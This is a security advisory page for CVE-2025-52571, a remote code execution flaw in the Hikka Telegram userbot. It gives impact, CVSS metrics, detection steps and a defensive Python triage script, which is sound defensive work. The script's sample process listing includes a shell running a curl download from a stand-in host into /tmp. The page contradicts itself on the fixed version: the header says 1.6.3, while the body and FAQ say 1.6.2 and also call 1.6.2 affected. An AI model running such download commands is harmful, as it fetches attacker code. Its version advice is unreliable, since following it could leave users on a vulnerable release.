Hikka vulnerable to RCE through edits in a channel
Platform
python
Component
hikariatama/hikka
Fixed in
1.6.3
CVE-2025-52571 describes a Remote Code Execution (RCE) vulnerability within Hikka, a Telegram userbot. This vulnerability allows an unauthenticated attacker to compromise a victim's Telegram account and gain full access to the server hosting the userbot. The vulnerability impacts versions of Hikka and its forks prior to 1.6.2, and a patch has been released in version 1.6.2.
Impact and attack scenarios
The impact of this vulnerability is severe. An attacker can leverage it to completely take over a victim's Telegram account, potentially accessing sensitive information, sending messages as the victim, and performing actions on their behalf. Furthermore, the attacker gains full access to the server hosting the Hikka userbot, enabling them to execute arbitrary code, steal data, install malware, or pivot to other systems on the network. This represents a significant security risk, especially if the server hosts other sensitive applications or data.
Exploitation context
This vulnerability was publicly disclosed on 2025-06-24. There are currently no known public exploits or active campaigns targeting CVE-2025-52571. The vulnerability's severity (CVSS 9.7) indicates a high probability of exploitation if left unpatched. It is not currently listed on the CISA KEV catalog.
Who is at risk
Users of Hikka Telegram userbot, particularly those running versions prior to 1.6.2, are at significant risk. This includes individuals and organizations utilizing Hikka for automated Telegram tasks or bot development. Shared hosting environments where multiple users share the same server are also at increased risk, as a compromise of one user's Hikka instance could potentially lead to broader system compromise.
Detection steps
• python / server: `ps aux | grep hikka`
• python / server: Check for unusual processes running under the Hikka user account.
• python / server: Examine system logs for suspicious commands or network connections originating from the Hikka userbot.
• python / server: Monitor for unauthorized Telegram account activity associated with the affected server.
Attack timeline
- Disclosure
Threat analysis
Exploit status
EPSS
0.18% (40th percentile)
CISA SSVC
CVSS vector
What do these metrics mean?
- Attack Vector
- Network: exploitable remotely over the internet. No physical or local access required.
- Attack Complexity
- Low: no special conditions required. Reliably exploitable.
- Privileges Required
- None: exploitable without authentication. No credentials required.
- User Interaction
- Required: the victim must open a file, click a link or visit a page.
- Scope
- Changed: the attack can spread beyond the vulnerable component to other systems.
- Confidentiality
- High: complete loss of confidentiality. The attacker can read all data.
- Integrity
- High: the attacker can write, modify or delete arbitrary data.
- Availability
- High: complete crash or resource exhaustion. Total denial of service.
Affected software
Vulnerability classification (CWE)
Timeline
- Reserved
- Published
- EPSS updated
Mitigation and workarounds
The primary mitigation for CVE-2025-52571 is to immediately upgrade Hikka to version 1.6.2 or later. Due to the nature of the RCE vulnerability, there are no known workarounds beyond upgrading. Ensure that automatic updates are enabled if possible to prevent future exploitation. After upgrading, verify the integrity of the installation by checking the version number and reviewing system logs for any suspicious activity.
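The detection steps and the post-upgrade version check above can be scripted. The following is an added example written for this page, not code from the advisory or from the Hikka project. It assumes the userbot runs under a dedicated service account named `hikka` and is launched as `python3 -m hikka` (both assumptions; adjust to your deployment), and the `ps aux` sample it parses is constructed, not captured from a real host.

```python
"""Triage helpers for CVE-2025-52571 (added example, not from the advisory).

Two checks a defender wants after reading the advisory:
  1. is the installed Hikka older than the fixed release (1.6.2 per the page)?
  2. is the Hikka service account running anything other than the userbot?
"""
import re
from typing import List, Tuple

FIXED_VERSION = (1, 6, 2)  # fixed release named in the advisory text


def parse_version(s: str) -> Tuple[int, ...]:
    """Turn '1.6.1', 'v1.6.2' or '1.7-beta' into a comparable tuple of ints."""
    m = re.match(r"v?(\d+(?:\.\d+)*)", s.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {s!r}")
    return tuple(int(p) for p in m.group(1).split("."))


def is_vulnerable(installed: str) -> bool:
    """True when the installed version is older than FIXED_VERSION."""
    v = parse_version(installed)
    # pad short versions so that (1, 6) compares like (1, 6, 0)
    v = v + (0,) * (len(FIXED_VERSION) - len(v))
    return v < FIXED_VERSION


# Constructed sample of `ps aux` output (not real data). The service account
# should be running only the userbot itself; anything else is worth a look.
SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1 168000 11000 ?        Ss   10:00   0:01 /sbin/init
hikka     1312  0.4  2.1 410000 86000 ?        Sl   10:01   0:42 python3 -m hikka --no-web
hikka     2044  0.0  0.0   8000  3000 ?        S    11:17   0:00 /bin/sh -c curl -s http://example.invalid/x -o /tmp/x
hikka     2045  0.0  0.0  12000  4000 ?        S    11:17   0:00 curl -s http://example.invalid/x -o /tmp/x
www-data   900  0.0  0.5  90000 20000 ?        S    10:00   0:00 nginx: worker process
"""

# Assumption: how the userbot is normally launched on this host.
EXPECTED_CMD = re.compile(r"^python3? (-m )?hikka\b")


def unexpected_processes(ps_output: str, user: str = "hikka") -> List[Tuple[int, str]]:
    """Return (pid, command) for every process owned by `user` whose command
    line is not the expected userbot launcher. Shells or download tools
    spawned under the bot account are the typical footprint of an RCE."""
    findings = []
    for line in ps_output.splitlines()[1:]:  # skip the header row
        fields = line.split(None, 10)  # COMMAND keeps its internal spaces
        if len(fields) < 11 or fields[0] != user:
            continue
        pid, cmd = int(fields[1]), fields[10]
        if not EXPECTED_CMD.match(cmd):
            findings.append((pid, cmd))
    return findings


if __name__ == "__main__":
    for ver in ("1.6.1", "1.6.2", "1.6.3"):
        print(f"Hikka {ver}: {'VULNERABLE' if is_vulnerable(ver) else 'patched'}")
    for pid, cmd in unexpected_processes(SAMPLE_PS):
        print(f"[!] unexpected process under hikka, pid {pid}: {cmd}")
```

On a live host, feed `unexpected_processes` the output of `ps aux` instead of the constructed sample; the version string can be taken from wherever your deployment records it (package metadata or the bot's own version output). The padding in `is_vulnerable` matters because a bare "1.6" must be treated as older than 1.6.2 rather than raising on length mismatch.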
How to fix
Update Hikka to version 1.6.2 or higher. This version contains the security fix that prevents remote code execution. The update can be performed with the package manager that was used to install Hikka.
Frequently asked questions
What is CVE-2025-52571 — Remote Code Execution in Hikka Telegram Userbot?
CVE-2025-52571 is a critical RCE vulnerability affecting Hikka Telegram userbots versions 1.6.2 and earlier, allowing attackers to gain control of accounts and servers.
Am I affected by CVE-2025-52571 in Hikka Telegram Userbot?
You are affected if you are using Hikka version 1.6.2 or earlier. Upgrade to 1.6.2 immediately to mitigate the risk.
How do I fix CVE-2025-52571 in Hikka Telegram Userbot?
Upgrade Hikka to version 1.6.2 or later. There are no known workarounds besides upgrading.
Is CVE-2025-52571 being actively exploited?
Currently, there are no confirmed reports of active exploitation, but the high severity score suggests a potential for future attacks.
Where can I find the official Hikka advisory for CVE-2025-52571?
Refer to the official Hikka project repository or website for the latest security advisories and release notes.